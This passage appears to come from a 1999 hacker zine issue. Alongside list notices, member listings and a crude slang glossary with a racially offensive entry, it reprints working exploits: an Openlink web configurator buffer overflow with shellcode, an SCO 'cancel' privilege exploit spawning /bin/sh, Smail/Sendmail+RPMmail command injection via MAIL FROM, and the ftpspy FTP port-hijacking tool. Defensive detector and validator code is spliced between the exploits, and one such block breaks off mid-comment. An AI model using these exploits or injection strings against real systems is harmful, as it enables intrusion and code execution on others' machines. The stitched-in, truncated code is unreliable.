      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. They are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and efficiently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributors.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 

    



    @HWA


 00.3 THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~
 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/programming/IRC+ man in black
      sas2@usa.net .............: currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      twisted-pair@home.com......: currently active/programming/IRC+


      Foreign Correspondents/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       HWA members ......................: World Media
       
      
      
      Past Foreign Correspondents (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Sla5h.............................: Croatia
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 
       Wyze1.............................: South Africa

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
      
      Sla5h's email: smuddo@yahoo.com
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events it's a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



 00.4 Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal usage and use in this zine are
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.

   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer

   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Dicentra            vexxation      sAs72
     Spikeman       p0lix               Vortexia      Wyze1
     Pneuma         Raven               Zym0t1c       duro
     Repluzer 
     
     Folks from #hwa.hax0r.news 
               
     Ken Williams/tattooman ex-of PacketStorm,
          
     & Kevin Mitnick                      
     
     kewl sites:
     
     + http://blacksun.box.sk. NEW
     + http://packetstorm.securify.com/ NEW
     + http://www.securityportal.com/ NEW
     + http://www.securityfocus.com/ NEW
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
    

    
          
     
      Thanks to myself for providing the info from my wired news feed and others from whatever
      sources, also to Spikeman for sending in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              
      Yeah we have a message board, feel free to use it, remember there are no stupid questions...
      well there are but if you ask something really dumb we'll just laugh at ya, lets give the
      message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
      domain comes back online (soon) meanwhile the beseen board is still up...
      
    
      ==============================================================================
      

      

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
     {
      printf ("Read commented source!\n\n");

     /*
      *It would appear that the admins at milmail after one year of good use
      *have decided to blackball my hwa@press.usmc.net address, fuckers. So
      *please send all mail to cruciphux@dok.org.... thanks and sorry for 
      *the problem.
      *
      * 
      *
      * Cruciphux
      */
      printf ("EoF.\n");
      }

      

      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and
     mailbombs can go to /dev/null, nukes, synfloods and papasmurfs to
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.
     
03.0  Exploit for Openlink's web configurator for Linux/glibc2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 

      /*
       * Exploit for Openlink's web configurator for Linux/glibc2
       *  use: pipe through netcat to openlink web port (8000 default)
       *  ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
       *  makes www_sv execute /usr/bin/wall if you hit the address right
       *
       * For informational purposes only.  This was written to show that
       *  there's a problem, not for skr1pt k1dd33z --.
       *  don't ask me for help on how to use this to crack systems,
       *  help compiling or anything else.  It will only compile on
       *  an x86 compiler however.
       *
       * Addresses that work for me: 0xbffffb65 (initial run of the broker)
       *                             0xbffffb85 (all consecutive attempts)
       *                             probably tied to process ID www_sv runs as;
       *                             first try PIDs were in triple digits, others
       *                             4 digit PIDs.
       *
       * If this works, generally no more www_sv processes will be run as
       * a side effect.
       *
       *                                                -Tymm
       */
      
      #include <stdio.h>
      #include <unistd.h>
      
      void test() {
      
      __asm__("
      
              jmp    doit
      exploit:
      
              # code basically from Aleph One's smash stacking article, with
              #  minor mods
      
              popl  %esi
              movb  $0xd0, %al            # Get a / character into %al
              xorb  $0xff, %al
              movb  %al, 0x1(%esi)        # drop /s into place
              movb  %al, 0x5(%esi)
              movb  %al, 0x9(%esi)
              xorl  %eax,%eax             # clear %eax
              movb  %eax,0xe(%esi)        # drop a 0 at end of string
              movl  %eax,0x13(%esi)       # drop NULL for environment
              leal  0x13(%esi),%edx       # point %edx to environment
              movl  %esi,0xf(%esi)        # drop pointer to argv
              leal  0xf(%esi),%ecx        # point %ecx to argv
              movl  %esi,%ebx             # point ebx to command - 1
              inc   %ebx                  # fix it to point to the right place
              movb  $0xb,%al              # index to execve syscall
              int   $0x80                 # execute it
              xorl  %ebx,%ebx             #  if exec failed, exit nicely...
              movl  %ebx,%eax
              inc   %eax
              int   $0x80
      doit:
              call exploit
              .string \"..usr.bin.wall.\"
      ");
      
      }
      
      char *shellcode = ((char *)test) + 3;
      
      char code[1000];
      
      int main(int argc, char *argv[])
      {
              int i;
              int left;
              unsigned char where[] = {"\0\0\0\0\0"} ;
              int *here;
              char *dummy;
              long addr;
      
              if (argc > 1)
                      addr = strtoul(argv[1], &dummy, 0);
              else
                      addr = 0xbffffb85;
      
              fprintf(stderr, "Setting address to %8x\n", addr);
      
              *((long *)where) = addr;
      
              strcpy(code, shellcode);
      
              for (i = 0; i < 64; i++) {
                      strcat(code, where);
              }
      
              printf("GET %s\n", code);
              exit(0);
      }
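
      Seen from the receiving side, the request that main() above prints is "GET ", a run of binary bytes, then one 4-byte address repeated 64 times. The block below is an added example (not part of the original post or of Openlink's software) that flags that layout in a raw request line; the function names, thresholds and the filler bytes in the sample are assumptions made for illustration.

```python
import struct

MAX_TARGET_LEN = 2048                          # assumed policy limit, tune per server
MIN_REPEATS = 8                                # identical consecutive 4-byte words = spray
STACK_LO, STACK_HI = 0xBF000000, 0xBFFFFFFF    # top of the classic 32-bit Linux/x86 user stack


def longest_word_run(data):
    """Return (word, count, offset) for the longest run of one repeated 4-byte word."""
    best = (b"", 0, -1)
    for phase in range(4):                     # the run need not start 4-byte aligned
        i = phase
        while i + 4 <= len(data):
            word = data[i:i + 4]
            j = i + 4
            while data[j:j + 4] == word:       # a short tail slice never compares equal
                j += 4
            count = (j - i) // 4
            if count > best[1]:
                best = (word, count, i)
            i = j
    return best


def inspect_request_line(raw):
    """Return findings for one raw request line, given as bytes read off the wire."""
    findings = []
    _method, _, target = raw.rstrip(b"\r\n").partition(b" ")
    if len(target) > MAX_TARGET_LEN:
        findings.append("target-too-long")
    # A request target is printable ASCII; anything else is worth a look.
    binary = sum(1 for b in target if b < 0x20 or b > 0x7E)
    if binary:
        findings.append("binary-bytes:%d" % binary)
    # A repeated word alone is a weak signal; one that decodes to a stack
    # address is the overwrite pattern this exploit relies on.
    word, count, offset = longest_word_run(target)
    if count >= MIN_REPEATS:
        findings.append("word-spray:%dx%s@%d" % (count, word.hex(), offset))
        addr = struct.unpack("<I", word)[0]
        if STACK_LO <= addr <= STACK_HI:
            findings.append("stack-address:0x%08x" % addr)
    return findings


# Constructed samples. FILLER is a stand-in for the binary payload (not real
# shellcode); the address is the default from the listing above, packed
# little-endian and repeated 64 times as the strcat loop does.
FILLER = bytes(range(0x80, 0xC0))
SAMPLE_ATTACK = b"GET " + FILLER + struct.pack("<I", 0xBFFFFB85) * 64 + b"\n"
SAMPLE_BENIGN = b"GET /index.html HTTP/1.0\r\n"

if __name__ == "__main__":
    for name, line in (("benign", SAMPLE_BENIGN), ("attack", SAMPLE_ATTACK)):
        print(name, inspect_request_line(line))
```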
      

     
     @HWA
     
     
04.0  sco_cancel.c yields egid=18(lp) Tested on SCO 5.0.5+Skunkware98
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From http://www.hack.co.za/ 
      
      /**
      *** sco_cancel.c yields egid=18(lp)
      *** Tested on SCO 5.0.5+Skunkware98
      *** 
      *** Compile gcc -o sco_cancelx.c sco_cancelx.c 
      ***
      ***  Brock Tellier btellier@usa.net
      ***       
      **/ 
      
      
      #include <stdlib.h>
      #include <stdio.h>
      
      char scoshell[]= /* doble@iname.com */
        "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
        "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
        "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
      
                             
      #define LEN 1500
      #define NOP 0x90
                             
      unsigned long get_sp(void) {
        __asm__("movl %esp, %eax");
      }
      
      
      int main(int argc, char *argv[]) {
      
        long int offset=0;
        int i;
        int buflen = LEN;
        long int addr;
        char buf[LEN];
       
        if(argc > 3) {
          fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
          exit(0); 
        }
        else if (argc == 2){
          offset=atoi(argv[1]);
        }
        else if (argc == 3) {
          offset=atoi(argv[1]);
          buflen=atoi(argv[2]); 
        }
        else {
          offset=600;
          buflen=1200;
        }
      
        addr=get_sp();
        fprintf(stderr, "\nSCO 5.0.5 cancel exploit yields egid=18(lp)\n");
        fprintf(stderr, "Brock Tellier btellier@webley.com\n\n");
        fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
      
        memset(buf,NOP,buflen);
        memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
        for(i=((buflen/2) + strlen(scoshell))+1;i<buflen-4;i+=4)
          *(int *)&buf[i]=addr+offset;
      
        execl("/opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel", "cancel", buf, NULL);
        exit(0);
      }
      
      @HWA     

05.0  Smail + RPMmail Exploit
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 

      Exploit:
      
        Smail + RPMmail
      
        bash-2.03$ telnet (host) 25
          Trying 127.0.0.1...
          Connected to localhost.
          Escape character is '^]'.
          220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999
          MAIL FROM: ;/command/to/execute;
          250 <;/command/to/execute;> ... Sender Okay
          RCPT TO: rpmmail
          250  ... Recipient Okay
          data
          354 Enter mail, end with "." on a line by itself
          .
          250 Mail accepted
          quit
      
        Sendmail 8.9.3 + RPMmail
         
        [nhaniff@dhcp-160-190 nhaniff]$ telnet (host) 25
          Trying 127.0.0.1...
          Connected to localhost.
          Escape character is '^]'.
          220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999
          helo x.x
          250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost 
          [127.0.0.1], pleased to meet you
          MAIL FROM: ;/command/to/execute;@microsoft.com
          250 <;/command/to/execute;@microsoft.com> ... Sender Okay
          RCPT TO: rpmmail
          250  ... Recipient Okay
          data
          354 Enter mail, end with "." on a line by itself
          .
          250 Mail accepted
          quit
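
      Added example (not part of the original post, and not code from Smail,
      Sendmail or RPMmail): a check that a delivery agent or log filter can
      apply to the MAIL FROM values typed in the sessions above before the
      address is used anywhere near a command line. Function names are
      hypothetical and the benign sample address is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

enum sender_verdict { NOT_MAIL_FROM, SENDER_OK, SENDER_REJECT };

/* Allowlist for an address that may later reach a shell or a file name:
 * letters, digits and a small set of punctuation. Everything else,
 * including ; | & ` $ / and whitespace, causes rejection. */
static int allowed_addr_char(unsigned char c)
{
    return c != '\0' && (isalnum(c) || strchr("@.-_+=", c) != NULL);
}

/* Classify one client line of an SMTP session. */
enum sender_verdict check_mail_from(const char *line)
{
    static const char verb[] = "MAIL FROM:";
    const char *p, *end;
    int at_signs = 0;

    while (*line == ' ' || *line == '\t')
        line++;
    if (strncasecmp(line, verb, sizeof verb - 1) != 0)
        return NOT_MAIL_FROM;
    p = line + (sizeof verb - 1);
    while (*p == ' ' || *p == '\t')
        p++;

    if (*p == '<') {
        /* Bracketed reverse-path; ESMTP parameters may follow the '>'. */
        end = strchr(p, '>');
        if (end == NULL)
            return SENDER_REJECT;
        if (end[1] != '\0' && !isspace((unsigned char)end[1]))
            return SENDER_REJECT;
        p++;
        if (p == end)
            return SENDER_OK;   /* "<>" is the null sender used by bounces */
    } else {
        /* Unbracketed form, as typed in the sessions above: take the
         * whole remainder so embedded spaces are seen and rejected. */
        end = p + strlen(p);
        while (end > p && isspace((unsigned char)end[-1]))
            end--;
        if (p == end)
            return SENDER_REJECT;
    }

    for (; p < end; p++) {
        if (!allowed_addr_char((unsigned char)*p))
            return SENDER_REJECT;
        if (*p == '@' && ++at_signs > 1)
            return SENDER_REJECT;
    }
    return SENDER_OK;
}

/* Count rejected senders in a captured session (client lines only). */
size_t count_rejected(const char *const lines[], size_t n)
{
    size_t i, hits = 0;

    for (i = 0; i < n; i++)
        if (check_mail_from(lines[i]) == SENDER_REJECT)
            hits++;
    return hits;
}

/* Constructed session: the two ';' sender values are the ones shown in
 * the sessions above, the bracketed address is a constructed benign one. */
const char *const SAMPLE_SESSION[] = {
    "helo x.x",
    "MAIL FROM: ;/command/to/execute;",
    "RCPT TO: rpmmail",
    "MAIL FROM: ;/command/to/execute;@microsoft.com",
    "MAIL FROM:<user@example.com> SIZE=1024",
    "data",
};

int main(void)
{
    size_t n = sizeof SAMPLE_SESSION / sizeof SAMPLE_SESSION[0];

    printf("%zu of %zu client lines carry a rejected sender\n",
           count_rejected(SAMPLE_SESSION, n), n);
    return 0;
}
```

      An allowlist like this is a second line of defence. Where a delivery
      program runs another program with the envelope sender, passing it as one
      element of an argument vector instead of through a shell command line removes the problem at its source.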
      
      
      @HWA     
      
06.0  ftpspy, ftp exploit
      ~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 
            
            /*
              ftpspy.c
              This program is written to show vulnerability of some FTP servers
              then establish passive ftp connection.
              You MAY use this program or any part of it to test your ftp server
              for this vulnerability. You MUST NOT use this program or any part 
              of it against another FTP server. 
      
              The program distributed "AS IS" without any guarantees.
      
              This program uses the fact, that most TCP/IP stacks allocate TCP ports
              for applications one-by-one. Program creates FTP connection to FTPPORT
              of attacked machine, logs in as USER with PASS and then every RETRYDELAY
              seconds sends PASV command to server to find which TCP port is used now
              by server. After port is discovered program bombs next NTHREAD ports 
              starting from found port + OFFSET with "connect" requests.
      
              Vuln: FreeBSD 2.2.1-2.2.5
      
              (c) 1999 3APA3A aka Wise Tomcat
              Please send all your comments to wise@tomcat.ru
                       /\_/\
                      { . . }     |\
              +--oQQo->{ ^ }<-----+ \
              |  3APA3A  U  3APA3A   }
              +-------------o66o--+ /
                                  |/
      */
      
      
      #include <stdio.h>
      #include <stdlib.h>     /* exit */
      #include <string.h>
      #include <ctype.h>      /* isdigit */
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      #include <arpa/inet.h>
      #include <unistd.h>     
      #include <setjmp.h>     
      #include <signal.h>
      
      #define DEBUGLEVEL 1
      #define USER "USER ftp\012"
      #define PASS "PASS root@\012"
      #define PASV "PASV\012"
      #define NTHREADS 3
      #define RETRYDELAY 10
      #define FTPPORT 21
      #define OFFSET 1
      #define TIMEOUT 5
      
      int gotit=0;
      char buf[4100];
      long size;
      int port;
      
      
      char * text =  "All my loving I will send to you\r\012All my loving, darling I'll be true\r\012 rw-r--r--  1 1012  5  406 Aug 08 10:08 loving\r\012" ;
      
      void usage( char* progname) {
       fprintf(stderr, "Usage: %s ipaddr\n", progname);
       exit(1);
      }
      
      void getsignal(int sig){
              if(!gotit){
      
      #if DEBUGLEVEL > 2
                      fprintf(stderr, "Port %d killed\n", port);
      #endif
      
                      exit(0); /* Papa asks me to shutdown! */
              }
      }
      
      
      jmp_buf env;
      
      
      int needalarm=0;
      void br(int sig){
              if(needalarm) longjmp(env,1);
      }
      /* Read FTP SERVER replies while they begin with '###-'. The last line looks like '### '. */
      
      void getftpdata(int sock){
       char * newl;
       while( (size = read(sock, buf, 1024)) > 0 ){
      
      #if DEBUGLEVEL > 1
              write(2, "<<", 2);
              write(2, buf, size);
      #endif
              if( size > 0 ) buf[size] = 0;
              for( newl=buf; newl && ((newl-buf) < (size-3)); newl = strchr(newl, '\012') ) if(newl[3] != '-' && isdigit(newl[1]) ) return;
       }
      }
      
      /* write command to FTP SERVER*/
      
      void writeftpdata(int sock, char* data){
              write(sock, data, strlen(data));
      
      #if DEBUGLEVEL > 1
              write(2, ">>", 2);
              write(2, data, strlen(data));
      #endif
      
      }
      
      int main(int argc, char* argv[]){
       struct sockaddr_in sin;
       int ftpsock, sock;
       char addr[16];
       int i;
       int code, a1, a2, a3, a4, p1, p2;
       pid_t children[NTHREADS];
       pid_t child;
       
       if(argc!=2) usage(argv[0]);
       sin.sin_addr.s_addr = inet_addr(argv[1]);
       sin.sin_family = AF_INET;
       sin.sin_port = htons(FTPPORT);
       if ((ftpsock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){
               fprintf(stderr, "Error: Unable to allocate socket\n");      
               return -1;                                 
       }
      
       /* connect to FTPPORT of FTP SERVER */
      
       if( connect(ftpsock, (struct sockaddr*)&sin,sizeof(sin)) == -1 ){
              fprintf(stderr, "Unable to connect %s:%d\n", argv[1], FTPPORT);
              return -2;
       }
      
       /* now log in as USER with PASS */
      
       getftpdata(ftpsock);
       writeftpdata(ftpsock, USER);
       getftpdata(ftpsock);
       writeftpdata(ftpsock, PASS);
       getftpdata(ftpsock);
      
      #if DEBUGLEVEL > 0
       fprintf(stderr, "Logged on\n");
      #endif
      
      
       for(;;){
      
              /* every RETRYDELAY seconds we send PASV  command to FTP SERVER
                 in order to have fresh information about ports it listens */
      
              writeftpdata(ftpsock, PASV);
              getftpdata(ftpsock);
              sscanf(buf, "%d Entering Passive Mode (%d,%d,%d,%d,%d,%d)", 
                      &code, &a1, &a2, &a3, &a4, &p1, &p2);
              if( code < 200 || code > 300 ){
                      fprintf(stderr, "Unable to enter PASV mode: %d\n", code);
                      return -3;
              }
              sprintf(addr, "%d.%d.%d.%d", a1, a2, a3, a4);
              port = p1 * 256 + p2; /* FTP SERVER allocated this port for us */
      
      #if DEBUGLEVEL > 2
              fprintf(stderr, "Got port %d\n", port);
      #endif
      
              sin.sin_addr.s_addr = inet_addr(addr);
      
      #if DEBUGLEVEL > 2
              fprintf(stderr, "Monitor: %s %d-%d\n", addr, port + 1, port + NTHREADS + OFFSET - 1);
      
              /* We will monitor this port range */
      
      #endif
      
              /* now let's fork() with NTHREADS - one thread for each port that will be bombed */
      
              for( i=0; (i < NTHREADS) && (child = fork()); i++ ) children[i] = child;
              if(child){              /* Lucky PAPA */
      
      #if DEBUGLEVEL > 2
                      fprintf(stderr, "%i threads started\n", i);
      #endif
      
                      /* It's a good time to sleep a little bit and then to kill
                         all these noisy children */
      
                      sleep(RETRYDELAY);
                      for( i=0; i<NTHREADS; i++ ) kill(children[i], SIGUSR1);
              }
              else {                  /* Happy child */
                      port += OFFSET +i;
      
      #if DEBUGLEVEL > 2
                      fprintf(stderr, "Monitor port %d started\n", port);
      #endif
      
                      signal(SIGUSR1, getsignal);
                      signal(SIGALRM, br);
                      sin.sin_port = htons(port);
                      for(;;){        /* Lets bomb the port! */
                              if( (sock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){
                                      printf("Error: Unable to allocate socket\n");      
                                      return -1;                                 
                              }
                              if( connect(sock, (struct sockaddr*)&sin,sizeof(sin)) != -1 ) break;
                              close(sock);
                      }
                      gotit = 1;      /* We did it!!! */
                      printf("Got it!!!! Port:%d\n", port);
                      if(!setjmp(env)){
                              needalarm=1;
                              alarm(TIMEOUT);
                              while( (size = read(sock, buf, 4096)) > 0 ) {
                                      needalarm = 0;
                                      write (1, buf, size);
                              }
                      }
                      else {
                              writeftpdata(sock, text);
                      }
                      close(sock);
                      return 0;
              }
       }
       return 0;
      }
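
      Added example (not part of ftpspy.c and not taken from any FTP server's
      source): the server-side check that defeats the race described in the
      header comment above, namely accepting a PASV data connection only from
      the host that owns the control connection. Function names are
      hypothetical and the sample addresses are constructed from documentation
      ranges.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Reduce an IPv4 or IPv6 socket address to a 16-byte key (IPv4 stored
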